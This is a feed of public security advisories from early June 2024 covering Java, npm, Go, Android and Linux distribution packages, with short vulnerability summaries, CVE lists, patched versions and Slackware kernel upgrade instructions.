04.06.2024 20:38:32maven[MAVEN:GHSA-8WH2-6QHJ-H7J9] iq80 Snappy out-of-bounds read when uncompressing data, leading to JVM crash (moderate)
### Summary
iq80 Snappy performs out-of-bounds read access when uncompressing certain data, which can lead to a JVM crash.
### Details
When uncompressing certain data, Snappy tries to read outside the bounds of the given byte arrays. Because Snappy uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM.
iq80 Snappy is not actively maintained anymore. As a quick fix users can upgrade to version 0.5, but in the long term users should prefer migrating to the Snappy implementation in https://github.com/airlift/aircompressor (version 0.27 or newer).
### Impact
When uncompressing data from untrusted users, this can be exploited for a denial-of-service attack by crashing the JVM.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8WH2-6QHJ-H7J9
04.06.2024 18:13:56npm[NPM:GHSA-9P6P-8V9R-8C9M] javascript-deobfuscator crafted payload can lead to code execution (high)javascript-deobfuscator removes common JavaScript obfuscation techniques. Crafted payloads targeting expression simplification can lead to code execution. This issue has been patched in version 1.1.0.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9P6P-8V9R-8C9M
04.06.2024 16:29:52ubuntu[USN-6805-1] libarchive vulnerability (high)libarchive could be made to crash or run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6805-1
04.06.2024 19:20:31go[GO-2024-2727] Constellation has pods exposed to peers in VPC in github.com/edgelesssys/constellation/v2https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2727
04.06.2024 21:07:39maven[MAVEN:GHSA-4W54-WWC9-X62C] Silverpeas authentication bypass (high)Silverpeas before 6.3.5 allows authentication bypass by omitting the Password field to AuthenticationServlet, often providing an unauthenticated user with superadmin access.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4W54-WWC9-X62C
04.06.2024 17:40:17android[ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078
07.06.2024 01:58:48npm[NPM:GHSA-WJMJ-H3XC-HXP8] Generation of Error Message Containing Sensitive Information in zsa (moderate)
### Impact
All users are impacted. The zsa application transfers the parse error stack from the server to the client in production build mode. This can potentially reveal sensitive information about the server environment, such as the machine username and directory paths. An attacker could exploit this vulnerability to gain unauthorized access to sensitive server information. This information could be used to plan further attacks or gain a deeper understanding of the server infrastructure.
### Patches
Yes, this has been patched in `0.3.3`.
### Workarounds
No way to fix other than the patch.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WJMJ-H3XC-HXP8
06.06.2024 20:15:51alpinelinux[ALPINE:CVE-2024-33655] unbound vulnerability[From CVE-2024-33655] The DNS protocol in RFC 1035 and updates allows remote attackers to cause a denial of service (resource consumption) by arranging for DNS queries to be accumulated for seconds, such that responses are later sent in a pulsing burst (which can be considered traffic amplification in some cases), aka the "DNSBomb" issue.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33655
06.06.2024 15:57:53almalinux[ALSA-2024:3667] cockpit security update (moderate)cockpit security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3667
06.06.2024 15:55:39almalinux[ALSA-2024:3666] tomcat security and bug fix update (important)tomcat security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3666
06.06.2024 16:02:22almalinux[ALSA-2024:3668] ruby:3.1 security, bug fix, and enhancement update (moderate)ruby:3.1 security, bug fix, and enhancement updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3668
06.06.2024 03:00:00oraclelinux[ELSA-2024-3666] tomcat security and bug fix update (important)[1:9.0.87-1.el8_10.1]: Resolves: RHEL-38548 - Amend tomcat package's changelog so that fixed CVEs are mentioned explicitly; Resolves: RHEL-35813 - Rebase tomcat to version 9.0.87; Resolves: RHEL-29255 tomcat: Apache Tomcat: WebSocket DoS with incomplete closing handshake (CVE-2024-23672); Resolves: RHEL-29250 tomcat: Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3666
06.06.2024 03:00:00oraclelinux[ELSA-2024-3667] cockpit security update (moderate)[310.4-1.0.1]: Update documentation links [Orabug: 34706402]; Drop subscription-manager-cockpit requirement for ol [Orabug: 34681110]; Remove duplicate reference to server in cockpit [Orabug: 33862832]; Update documentation links [Orabug: 32795691]; Make documentation links point to Oracle Linux information [Orabug: 30271413] [Orabug: 32013095]; Fix rendering of hwinfo page on systems with some empty memory slots [Orabug: 32826970]. [310.4-1]: sosreport: Fix command injection with crafted report names [CVE-2024-2947] (jira#RHEL-30452)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3667
06.06.2024 03:00:00oraclelinux[ELSA-2024-3669] less security update (important)[458-10]: Fix CVE-2024-32487; Resolves: RHEL-32802https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3669
06.06.2024 03:00:00oraclelinux[ELSA-2024-3619] kernel security and bug fix update (moderate)[5.14.0-427.20.1_4.OL9]: Disable UKI signing [Orabug: 36571828]; Update Oracle Linux certificates (Kevin Lyons); Disable signing for aarch64 (Ilya Okomin); Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]; Update x509.genkey [Orabug: 24817676]; Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5; Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]; Add Oracle Linux IMA certificates. [5.14.0-427.20.1_4]: ipv6: sr: fix possible use-after-free and null-ptr-deref (Hangbin Liu) [RHEL-33968 RHEL-31732] {CVE-2024-26735}; idpf: fix kernel panic on unknown packet types (Michal Schmidt) [RHEL-36145 RHEL-29035]; idpf: refactor some missing field get/prep conversions (Michal Schmidt) [RHEL-36145 RHEL-29035]; PCI: Fix pci_rh_check_status() call semantics (Luiz Capitulino) [RHEL-36541 RHEL-35032]; cxgb4: Properly lock TX queue for the selftest. (John B. Wyatt IV) [RHEL-36530 RHEL-31990 RHEL-9354]. [5.14.0-427.19.1_4]: x86/mce: Cleanup mce_usable_address() (Prarit Bhargava) [RHEL-33810 RHEL-25415]; x86/mce: Define amd_mce_usable_address() (Prarit Bhargava) [RHEL-33810 RHEL-25415]; x86/MCE/AMD: Split amd_mce_is_memory_error() (Prarit Bhargava) [RHEL-33810 RHEL-25415]; fs: sysfs: Fix reference leak in sysfs_break_active_protection() (Ewan D. Milne) [RHEL-35302 RHEL-35078] {CVE-2024-26993}https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3619
05.06.2024 23:10:42ubuntu[USN-6808-1] Atril vulnerabilityAtril could be made to create arbitrary files when opening a specially crafted EPUB file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6808-1
05.06.2024 22:56:58ubuntu[USN-6809-1] BlueZ vulnerabilitiesSeveral security issues were fixed in BlueZ.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6809-1
05.06.2024 22:11:11slackware[SSA:2024-157-01] Slackware 15.0 kernelNew kernel packages are available for Slackware 15.0 to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/linux-5.15.160/*: Upgraded. These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 5.15.147: https://www.cve.org/CVERecord?id=CVE-2023-52340 https://www.cve.org/CVERecord?id=CVE-2023-6040 https://www.cve.org/CVERecord?id=CVE-2024-0646 Fixed in 5.15.148: https://www.cve.org/CVERecord?id=CVE-2023-46838 https://www.cve.org/CVERecord?id=CVE-2023-52436 https://www.cve.org/CVERecord?id=CVE-2023-52438 https://www.cve.org/CVERecord?id=CVE-2023-52439 https://www.cve.org/CVERecord?id=CVE-2023-52443 https://www.cve.org/CVERecord?id=CVE-2023-52444 https://www.cve.org/CVERecord?id=CVE-2023-52445 https://www.cve.org/CVERecord?id=CVE-2023-52448 https://www.cve.org/CVERecord?id=CVE-2023-52449 https://www.cve.org/CVERecord?id=CVE-2023-52451 https://www.cve.org/CVERecord?id=CVE-2023-52454 https://www.cve.org/CVERecord?id=CVE-2023-52456 https://www.cve.org/CVERecord?id=CVE-2023-52458 https://www.cve.org/CVERecord?id=CVE-2023-52463 https://www.cve.org/CVERecord?id=CVE-2023-52464 https://www.cve.org/CVERecord?id=CVE-2023-52467 https://www.cve.org/CVERecord?id=CVE-2023-52469 https://www.cve.org/CVERecord?id=CVE-2023-52470 https://www.cve.org/CVERecord?id=CVE-2023-52609 https://www.cve.org/CVERecord?id=CVE-2023-52610 https://www.cve.org/CVERecord?id=CVE-2023-52612 https://www.cve.org/CVERecord?id=CVE-2023-6356 https://www.cve.org/CVERecord?id=CVE-2023-6536 https://www.cve.org/CVERecord?id=CVE-2023-6915 
https://www.cve.org/CVERecord?id=CVE-2024-1085 https://www.cve.org/CVERecord?id=CVE-2024-24860 https://www.cve.org/CVERecord?id=CVE-2024-26586 https://www.cve.org/CVERecord?id=CVE-2024-26589 https://www.cve.org/CVERecord?id=CVE-2024-26591 https://www.cve.org/CVERecord?id=CVE-2024-26597 https://www.cve.org/CVERecord?id=CVE-2024-26598 https://www.cve.org/CVERecord?id=CVE-2024-26631 https://www.cve.org/CVERecord?id=CVE-2024-26633 Fixed in 5.15.149: https://www.cve.org/CVERecord?id=CVE-2023-52429 https://www.cve.org/CVERecord?id=CVE-2023-52435 https://www.cve.org/CVERecord?id=CVE-2023-52486 https://www.cve.org/CVERecord?id=CVE-2023-52489 https://www.cve.org/CVERecord?id=CVE-2023-52491 https://www.cve.org/CVERecord?id=CVE-2023-52492 https://www.cve.org/CVERecord?id=CVE-2023-52493 https://www.cve.org/CVERecord?id=CVE-2023-52494 https://www.cve.org/CVERecord?id=CVE-2023-52498 https://www.cve.org/CVERecord?id=CVE-2023-52583 https://www.cve.org/CVERecord?id=CVE-2023-52587 https://www.cve.org/CVERecord?id=CVE-2023-52588 https://www.cve.org/CVERecord?id=CVE-2023-52594 https://www.cve.org/CVERecord?id=CVE-2023-52595 https://www.cve.org/CVERecord?id=CVE-2023-52597 https://www.cve.org/CVERecord?id=CVE-2023-52598 https://www.cve.org/CVERecord?id=CVE-2023-52599 https://www.cve.org/CVERecord?id=CVE-2023-52600 https://www.cve.org/CVERecord?id=CVE-2023-52601 https://www.cve.org/CVERecord?id=CVE-2023-52602 https://www.cve.org/CVERecord?id=CVE-2023-52603 https://www.cve.org/CVERecord?id=CVE-2023-52604 https://www.cve.org/CVERecord?id=CVE-2023-52606 https://www.cve.org/CVERecord?id=CVE-2023-52607 https://www.cve.org/CVERecord?id=CVE-2023-52608 https://www.cve.org/CVERecord?id=CVE-2023-52614 https://www.cve.org/CVERecord?id=CVE-2023-52615 https://www.cve.org/CVERecord?id=CVE-2023-52616 https://www.cve.org/CVERecord?id=CVE-2023-52617 https://www.cve.org/CVERecord?id=CVE-2023-52618 https://www.cve.org/CVERecord?id=CVE-2023-52619 https://www.cve.org/CVERecord?id=CVE-2023-52622 
https://www.cve.org/CVERecord?id=CVE-2023-52623 https://www.cve.org/CVERecord?id=CVE-2023-52627 https://www.cve.org/CVERecord?id=CVE-2023-52630 https://www.cve.org/CVERecord?id=CVE-2023-52631 https://www.cve.org/CVERecord?id=CVE-2023-52633 https://www.cve.org/CVERecord?id=CVE-2023-52635 https://www.cve.org/CVERecord?id=CVE-2023-52637 https://www.cve.org/CVERecord?id=CVE-2023-52638 https://www.cve.org/CVERecord?id=CVE-2024-0340 https://www.cve.org/CVERecord?id=CVE-2024-1086 https://www.cve.org/CVERecord?id=CVE-2024-1151 https://www.cve.org/CVERecord?id=CVE-2024-23849 https://www.cve.org/CVERecord?id=CVE-2024-23850 https://www.cve.org/CVERecord?id=CVE-2024-23851 https://www.cve.org/CVERecord?id=CVE-2024-26592 https://www.cve.org/CVERecord?id=CVE-2024-26593 https://www.cve.org/CVERecord?id=CVE-2024-26594 https://www.cve.org/CVERecord?id=CVE-2024-26600 https://www.cve.org/CVERecord?id=CVE-2024-26602 https://www.cve.org/CVERecord?id=CVE-2024-26606 https://www.cve.org/CVERecord?id=CVE-2024-26608 https://www.cve.org/CVERecord?id=CVE-2024-26610 https://www.cve.org/CVERecord?id=CVE-2024-26614 https://www.cve.org/CVERecord?id=CVE-2024-26615 https://www.cve.org/CVERecord?id=CVE-2024-26625 https://www.cve.org/CVERecord?id=CVE-2024-26627 https://www.cve.org/CVERecord?id=CVE-2024-26635 https://www.cve.org/CVERecord?id=CVE-2024-26636 https://www.cve.org/CVERecord?id=CVE-2024-26640 https://www.cve.org/CVERecord?id=CVE-2024-26641 https://www.cve.org/CVERecord?id=CVE-2024-26644 https://www.cve.org/CVERecord?id=CVE-2024-26645 https://www.cve.org/CVERecord?id=CVE-2024-26660 https://www.cve.org/CVERecord?id=CVE-2024-26663 https://www.cve.org/CVERecord?id=CVE-2024-26664 https://www.cve.org/CVERecord?id=CVE-2024-26665 https://www.cve.org/CVERecord?id=CVE-2024-26668 https://www.cve.org/CVERecord?id=CVE-2024-26671 https://www.cve.org/CVERecord?id=CVE-2024-26673 https://www.cve.org/CVERecord?id=CVE-2024-26675 https://www.cve.org/CVERecord?id=CVE-2024-26676 
https://www.cve.org/CVERecord?id=CVE-2024-26679 https://www.cve.org/CVERecord?id=CVE-2024-26684 https://www.cve.org/CVERecord?id=CVE-2024-26685 https://www.cve.org/CVERecord?id=CVE-2024-26689 https://www.cve.org/CVERecord?id=CVE-2024-26696 https://www.cve.org/CVERecord?id=CVE-2024-26697 https://www.cve.org/CVERecord?id=CVE-2024-26698 https://www.cve.org/CVERecord?id=CVE-2024-26702 https://www.cve.org/CVERecord?id=CVE-2024-26704 https://www.cve.org/CVERecord?id=CVE-2024-26707 https://www.cve.org/CVERecord?id=CVE-2024-26712 https://www.cve.org/CVERecord?id=CVE-2024-26715 https://www.cve.org/CVERecord?id=CVE-2024-26717 https://www.cve.org/CVERecord?id=CVE-2024-26720 https://www.cve.org/CVERecord?id=CVE-2024-26727 https://www.cve.org/CVERecord?id=CVE-2024-26808 Fixed in 5.15.150: https://www.cve.org/CVERecord?id=CVE-2023-52434 https://www.cve.org/CVERecord?id=CVE-2023-52497 https://www.cve.org/CVERecord?id=CVE-2023-52640 https://www.cve.org/CVERecord?id=CVE-2023-52641 https://www.cve.org/CVERecord?id=CVE-2024-0565 https://www.cve.org/CVERecord?id=CVE-2024-26601 https://www.cve.org/CVERecord?id=CVE-2024-26603 https://www.cve.org/CVERecord?id=CVE-2024-26733 https://www.cve.org/CVERecord?id=CVE-2024-26735 https://www.cve.org/CVERecord?id=CVE-2024-26736 https://www.cve.org/CVERecord?id=CVE-2024-26737 https://www.cve.org/CVERecord?id=CVE-2024-26743 https://www.cve.org/CVERecord?id=CVE-2024-26744 https://www.cve.org/CVERecord?id=CVE-2024-26747 https://www.cve.org/CVERecord?id=CVE-2024-26748 https://www.cve.org/CVERecord?id=CVE-2024-26749 https://www.cve.org/CVERecord?id=CVE-2024-26751 https://www.cve.org/CVERecord?id=CVE-2024-26752 https://www.cve.org/CVERecord?id=CVE-2024-26754 https://www.cve.org/CVERecord?id=CVE-2024-26763 https://www.cve.org/CVERecord?id=CVE-2024-26764 https://www.cve.org/CVERecord?id=CVE-2024-26766 https://www.cve.org/CVERecord?id=CVE-2024-26769 https://www.cve.org/CVERecord?id=CVE-2024-26771 https://www.cve.org/CVERecord?id=CVE-2024-26772 
https://www.cve.org/CVERecord?id=CVE-2024-26773 https://www.cve.org/CVERecord?id=CVE-2024-26774 https://www.cve.org/CVERecord?id=CVE-2024-26776 https://www.cve.org/CVERecord?id=CVE-2024-26777 https://www.cve.org/CVERecord?id=CVE-2024-26778 https://www.cve.org/CVERecord?id=CVE-2024-26779 Fixed in 5.15.151: https://www.cve.org/CVERecord?id=CVE-2023-52620 https://www.cve.org/CVERecord?id=CVE-2024-0841 https://www.cve.org/CVERecord?id=CVE-2024-26622 https://www.cve.org/CVERecord?id=CVE-2024-26688 https://www.cve.org/CVERecord?id=CVE-2024-26782 https://www.cve.org/CVERecord?id=CVE-2024-26788 https://www.cve.org/CVERecord?id=CVE-2024-26790 https://www.cve.org/CVERecord?id=CVE-2024-26791 https://www.cve.org/CVERecord?id=CVE-2024-26793 https://www.cve.org/CVERecord?id=CVE-2024-26795 https://www.cve.org/CVERecord?id=CVE-2024-26798 https://www.cve.org/CVERecord?id=CVE-2024-26801 https://www.cve.org/CVERecord?id=CVE-2024-26802 https://www.cve.org/CVERecord?id=CVE-2024-26803 https://www.cve.org/CVERecord?id=CVE-2024-26804 https://www.cve.org/CVERecord?id=CVE-2024-26805 Fixed in 5.15.152: https://www.cve.org/CVERecord?id=CVE-2024-26659 https://www.cve.org/CVERecord?id=CVE-2024-26787 Fixed in 5.15.153: https://www.cve.org/CVERecord?id=CVE-2023-52447 https://www.cve.org/CVERecord?id=CVE-2023-6270 https://www.cve.org/CVERecord?id=CVE-2023-7042 https://www.cve.org/CVERecord?id=CVE-2024-22099 https://www.cve.org/CVERecord?id=CVE-2024-26651 https://www.cve.org/CVERecord?id=CVE-2024-26809 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! 
:-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-generic-5.15.160-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-generic-smp-5.15.160_smp-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-headers-5.15.160_smp-x86-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-huge-5.15.160-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-huge-smp-5.15.160_smp-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-modules-5.15.160-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-modules-smp-5.15.160_smp-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-source-5.15.160_smp-noarch-1.txz
Updated packages for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-generic-5.15.160-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-headers-5.15.160-x86-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-huge-5.15.160-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-modules-5.15.160-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-source-5.15.160-noarch-1.txz
**MD5 signatures**
Slackware 15.0 packages:
9a5f0b30b8557ee0f995e157e668bbab kernel-generic-5.15.160-i586-1.txz
dbc4ab11932f6e1b53f31bfa28bbd920 kernel-generic-smp-5.15.160_smp-i686-1.txz
9d916ab958cb3efafedca2b4d63787b6 kernel-headers-5.15.160_smp-x86-1.txz
9f15be076ef0edce60ce9c0024b1f2ce kernel-huge-5.15.160-i586-1.txz
cb88980a1a24894d809904add3571c90 kernel-huge-smp-5.15.160_smp-i686-1.txz
2d971a34e5f0ca005e45ca9028de4085 kernel-modules-5.15.160-i586-1.txz
1f5ae65fd73694a902c6210b21132c7f kernel-modules-smp-5.15.160_smp-i686-1.txz
02decce15d2cecaa97c63b2c44c57ecb kernel-source-5.15.160_smp-noarch-1.txz
Slackware x86_64 15.0 packages:
a08d3e9b7cd8acb1f3541423af4f5033 kernel-generic-5.15.160-x86_64-1.txz
3c4c4d0cf660b807f16d7a3d02a2bc98 kernel-headers-5.15.160-x86-1.txz
6459e19c0b7697bbfc8a37897f7f72d0 kernel-huge-5.15.160-x86_64-1.txz
d993f853995368eef81caacc7b2fc454 kernel-modules-5.15.160-x86_64-1.txz
d973ec20bc738201d4e6a3de344b7257 kernel-source-5.15.160-noarch-1.txz
**Installation instructions**
Upgrade the packages as root:
`# upgradepkg kernel-*.txz`
If you are using an initrd, you'll need to rebuild it.
For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 15.0):
`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.160-smp | bash`
For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 15.0):
`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.160 | bash`
Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 5.15.160-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 5.15.160 as the version.
If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.
If using LILO:
By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.
If using elilo:
Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-157-01
05.06.2024 20:19:09 | ubuntu | [USN-6807-1] FRR vulnerabilities
FRR could be made to crash or run programs if it received specially crafted network traffic.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6807-1
05.06.2024 19:53:49 | maven | [MAVEN:GHSA-G762-H86W-8749] BoringSSLAEADContext in Netty Repeats Nonces (moderate)
### Summary
BoringSSLAEADContext keeps track of how many OHTTP responses have been sent and uses this sequence number to calculate the appropriate nonce to use with the encryption algorithm. Unfortunately, two separate errors combine which would allow an attacker to cause the sequence number to overflow and thus the nonce to repeat.
### Details
1. There is no overflow detection or enforcement of the maximum sequence value. (This is a missed requirement from the draft Chunked Oblivious OHTTP RFC and so should be inherited from the HPKE RFC 9180, Section 5.2).
2. The sequence number (seq) is stored as 32-bit int which is relatively easy to overflow.
https://github.com/netty/netty-incubator-codec-ohttp/blob/1ddadb6473cd3be5491d114431ed4c1a9f316001/codec-ohttp-hpke-classes-boringssl/src/main/java/io/netty/incubator/codec/hpke/boringssl/BoringSSLAEADContext.java#L112-L114
### Impact
If the BoringSSLAEADContext is used to encrypt more than 2^32 messages then the AES-GCM nonce will repeat.
Repeating a nonce with AES-GCM results in both confidentiality and integrity compromise of data encrypted with the associated key.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G762-H86W-8749
05.06.2024 16:41:43 | ubuntu | [USN-6806-1] GDK-PixBuf vulnerability
GDK-PixBuf could be made to crash or run programs as your login if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6806-1
05.06.2024 16:29:12 | npm | [NPM:GHSA-665W-MWRR-77Q3] Arbitrary file read via Playwright's screenshot feature exploiting file wrapper (moderate)
### Impact
All users of url-to-png. Please see https://github.com/jasonraimondi/url-to-png/issues/47
### Patches
[v2.0.3](https://github.com/jasonraimondi/url-to-png/releases/tag/v2.0.3) requires input url to be of protocol `http` or `https`
### Workarounds
Requires upgrade.
### References
- https://github.com/jasonraimondi/url-to-png/issues/47
- https://github.com/user-attachments/files/15536336/Arbitrary.File.Read.via.Playwright.s.Screenshot.Feature.Exploiting.File.Wrapper.pdf
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-665W-MWRR-77Q3
05.06.2024 16:17:14 | ubuntu | [USN-6715-2] unixODBC vulnerability
unixODBC could be made to crash or execute arbitrary code.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6715-2
05.06.2024 21:34:23 | almalinux | [ALSA-2024:3626] libxml2 security update (moderate)
libxml2 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3626
05.06.2024 20:12:39 | almalinux | [ALSA-2024:3618] kernel update (moderate)
kernel update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3618
05.06.2024 03:00:00 | debian | [DSA-5704-1] pillow
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5704-1
05.06.2024 03:00:00 | debian | [DSA-5705-1] tinyproxy
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5705-1
05.06.2024 03:00:00 | debian | [DSA-5706-1] libarchive
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5706-1
05.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3588] glibc security update (important)
[2.17-326.3]
- Forward-port Oracle patches to 2.17-326.3 Reviewed-by: Jose E. Marchesi
[2.17-326.3]
- nscd: Fix timeout type in netgroup cache (RHEL-34263)
[2.17-326.2]
- nscd: Do not use sendfile for the netgroup cache
- nscd: Use-after-free in netgroup cache
- CVE-2021-27645: nscd: double-free in netgroup cache
- CVE-2024-33599: nscd: buffer overflow in netgroup cache (RHEL-34263)
- CVE-2024-33600: nscd: null pointer dereferences in netgroup cache
- CVE-2024-33601: nscd: crash on out-of-memory condition
- CVE-2024-33602: nscd: memory corruption with NSS netgroup modules
[2.17-326.1]
- CVE-2024-2961: Out of bounds write in iconv conversion to ISO-2022-CN-EXT (RHEL-31803)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3588
05.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3626] libxml2 security update (moderate)
[2.9.7-18.1]
- Fix CVE-2024-25062 (RHEL-31056)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3626
05.06.2024 03:00:00 | redhat | [RHSA-2024:3626] libxml2 security update (moderate)
The libxml2 library is a development toolbox providing the implementation of various XML standards.

Security Fix(es):

* libxml2: use-after-free in XMLReader (CVE-2024-25062)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3626
05.06.2024 03:00:00 | redhat | [RHSA-2024:3618] kernel update (moderate)
The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (CVE-2023-6240)
* kernel: Information disclosure in vhost/vhost.c:vhost_new_msg() (CVE-2024-0340)
* kernel: untrusted VMM can trigger int80 syscall handling (CVE-2024-25744)
* kernel: i2c: i801: Fix block process call transactions (CVE-2024-26593)
* kernel: pvrusb2: fix use after free on context disconnection (CVE-2023-52445)
* kernel: x86/fpu: Stop relying on userspace for info to fault in xsave buffer that cause loop forever (CVE-2024-26603)
* kernel: use after free in i2c (CVE-2019-25162)
* kernel: i2c: validate user data in compat ioctl (CVE-2021-46934)
* kernel: media: dvbdev: Fix memory leak in dvb_media_device_free() (CVE-2020-36777)
* kernel: usb: hub: Guard against accesses to uninitialized BOS descriptors (CVE-2023-52477)
* kernel: mtd: require write permissions for locking and badblock ioctls (CVE-2021-47055)
* kernel: net/smc: fix illegal rmb_desc access in SMC-D connection dump (CVE-2024-26615)
* kernel: vt: fix memory overlapping when deleting chars in the buffer (CVE-2022-48627)
* kernel: Integer Overflow in raid5_cache_count (CVE-2024-23307)
* kernel: media: uvcvideo: out-of-bounds read in uvc_query_v4l2_menu() (CVE-2023-52565)
* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)
* kernel: net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg (CVE-2023-52528)
* kernel: platform/x86: think-lmi: Fix reference leak (CVE-2023-52520)
* kernel: RDMA/siw: Fix connection failure handling (CVE-2023-52513)
* kernel: pid: take a reference when initializing `cad_pid` (CVE-2021-47118)
* kernel: net/sched: act_ct: fix skb leak and crash on ooo frags (CVE-2023-52610)
* kernel: netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout (CVE-2024-26643)
* kernel: netfilter: nf_tables: disallow anonymous set with timeout flag (CVE-2024-26642)
* kernel: i2c: i801: Don't generate an interrupt on bus reset (CVE-2021-47153)
* kernel: xhci: handle isoc Babble and Buffer Overrun events properly (CVE-2024-26659)
* kernel: hwmon: (coretemp) Fix out-of-bounds memory access (CVE-2024-26664)
* kernel: wifi: mac80211: fix race condition on enabling fast-xmit (CVE-2024-26779)
* kernel: RDMA/srpt: Support specifying the srpt_service_guid parameter (CVE-2024-26744)
* kernel: RDMA/qedr: Fix qedr_create_user_qp error flow (CVE-2024-26743)
* kernel: tty: tty_buffer: Fix the softlockup issue in flush_to_ldisc (CVE-2021-47185)
* kernel: do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak (CVE-2024-26901)
* kernel: RDMA/srpt: Do not register event handler until srpt device is fully setup (CVE-2024-26872)
* kernel: usb: ulpi: Fix debugfs directory leak (CVE-2024-26919)
* kernel: usb: xhci: Add error handling in xhci_map_urb_for_dma (CVE-2024-26964)
